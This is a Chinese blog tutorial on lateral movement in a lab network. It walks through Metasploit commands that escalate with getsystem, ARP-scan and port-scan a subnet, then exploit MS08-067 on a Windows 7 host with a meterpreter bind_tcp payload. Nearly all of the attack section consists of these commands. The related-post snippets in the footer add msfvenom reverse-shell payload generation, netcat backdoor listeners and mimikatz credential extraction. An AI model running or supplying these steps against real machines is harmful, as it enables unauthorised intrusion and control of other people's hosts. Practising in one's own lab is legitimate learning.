内网渗透 -- 获取内网中其他主机权限

最新推荐文章于 2024-08-22 22:20:04 发布
最新推荐文章于 2024-08-22 22:20:04 发布
阅读量2.4k 收藏 14
点赞数
分类专栏: 某教程学习笔记 文章标签: 内网渗透 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/107131848
版权

 

每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。

----  网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.144

          小小受:win7 x64 ,ip:  192.168.1.130

 

一、生成木马及监听主机参考上篇文章:

 

 

二、获取小受的IP地址

meterpreter > getsystem

 

三、获取内网中存活的主机,以一台win03主机为例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

 

 

四、端口扫描,看看小小受开放了那些端口

1、选择用到的模块:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的参数:show options

3、设置要扫描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、设置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、执行:msf5 auxiliary(scanner/portscan/tcp) > run   

 

 

                                

 

五、利用ms08_067漏洞拿下小小受   

1、搜索ms08_067模块信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、选择该模块并设置payload

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的参数:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、设置目标主机并执行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

 

 

 

 

 

 

web安全工具库
关注
专栏目录
内网渗透-域内的权限维持
lza20001103的博客
10-01 1063
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux权限维持,这期我们讲一下域内的权限维持,权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网渗透-Linux权限维持
lza20001103的博客
09-26 2410
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window权限维持的方法,本期给大家讲解一下Linux权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
内网主机进行渗透并执行关机
热门推荐
max_ii_min的博客
03-01 2万+
1:渗透目标 查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。 2:准备阶段 2.1软件 Kali linux Windows XP SP3 Chinese - Simplified (NX) vmware 15 pro 2.2网络配置如下 Windows XP SP3 Chinese - Simplified (N...
内网安全内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
网络安全领域___专研者.
06-05 2374
内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可.
kali渗透内网和外网
最新发布
dzqxwzoe的博客
08-22 984
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
获取目标内网入口
kun blog
04-28 302
渗透测试内网渗透学习,超详细
z099164的博客
07-04 4170
渗透测试内网渗透学习,超详细
目标攻击漏洞获取目标机器最高权限
jjxsir的博客
12-22 1712
目标攻击漏洞获取目标机器最高权限 目标站点 target: win7x64 192.168.123.1 60[DHCP] attack: kali-linux 192.168.123.136 方法一:通过web站点,使用无文件的方式攻去利用执行 方法二:通过web站点, 上传webshell,返回給msf 方法三:攻击其他端口服务,拿到meterpreterc 信息收集总在前- nmap端口扫描 root@kali:~# nmap -sV -T4 192.168.123.160 Starting Nmap
[HACK学习呀] - 2020-08-23 内网渗透 - 内网的信息收集1
08-03
内网渗透是网络安全领域的重要环节,特别是在企业网络环境,一旦突破外围防线,内网信息收集成为继续渗透的关键步骤。本文将详细阐述内网的信息收集方法,主要关注在工作组环境下的策略。 首先,识别网络环境是...
ISC-内网渗透 -最终版.pdf
04-08
远程命令执行是内网渗透非常重要的环节,常见的技术手段有: - **PsExec**:通过创建一个名为PSEXESVC的服务来执行命令。 - **WMIEXEC**:利用Windows Management Instrumentation (WMI) 服务执行命令。 - **AT/...
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
Windows内网渗透主要针对Windows域环境,因为域控制器拥有高级权限,可以控制整个域内的计算机,从而获取目标权限和数据。 1. **服务主体名称(SPN)收集**: SPN是Kerberos协议的关键元素,用于识别提供服务的...
局域网内得到另外电脑的桌面图像及简单的控制
03-08
局域网内得到另外电脑的桌面图像及简单的控制在MFC实现
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1959
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
看我如何快速拿下整个C段主机权限
渗透测试研究中心
01-24 487
0x01 前言Date/time:2015年,这次渗透测试发现已经拿下的几台机器的管理员密码存在一定规律性,最终通过分析密码规律、组合新密码成功拿下目标整个C段机器权限,个人感觉这是个不错的内网通用/规律密码实战案例,所以想着还是记录一下吧。0x02 Getshell过程网站基本信息探测:目标站点:http://www.that****elos.com.br 服务器IP:189.**.**.2...
kali linux查看局域网下所有IP,并对指定IP攻击
weixin_44145452的博客
08-18 4558
因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击。前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址。来确认本机的ip地址。这样这个攻击就停止了。
kali linux外网渗透指定ip,kali Linux局域网渗透之win10
weixin_39796152的博客
05-04 4325
kali机:192.168.198.134win10:192.168.198.1我们先来查看下自己的IP地址watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)2020-1-1...
华为服务器可以屏蔽娱乐网站吗,网络安全工程师演示:原来***是这样控制你的网站服务器的!...
weixin_32009069的博客
08-03 203
课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali 与编程,学习更多网络***干货!3、Kali 与编程每天准时更新,敬请学习和关注!正文部分一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者...
linux内网劫持教程,利用kali进行dns劫持入侵局域网
weixin_39893042的博客
05-10 768
物理主机:kali2.0 192.168.1.50目标主机:整个局域网运行msfconsole依次输入:use exploit/windows/browser/ms10_046_shortcut_icon_dllloader //加载10_046浏览器漏洞模块setg SRVHOST 192.168.1.50 //设置全局服务主机IPset PAYLOAD windows/meterpreter/...
内网渗透:密码凭证获取技术详解
"这篇文档是关于内网渗透测试密码凭证获取的总结,重点讨论了在Windows系统如何获取本地用户凭据,包括SAM文件和lsass.exe进程的信息。内容涉及利用reg命令保存SAM文件,使用mimikatz工具提取密码Hash,以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值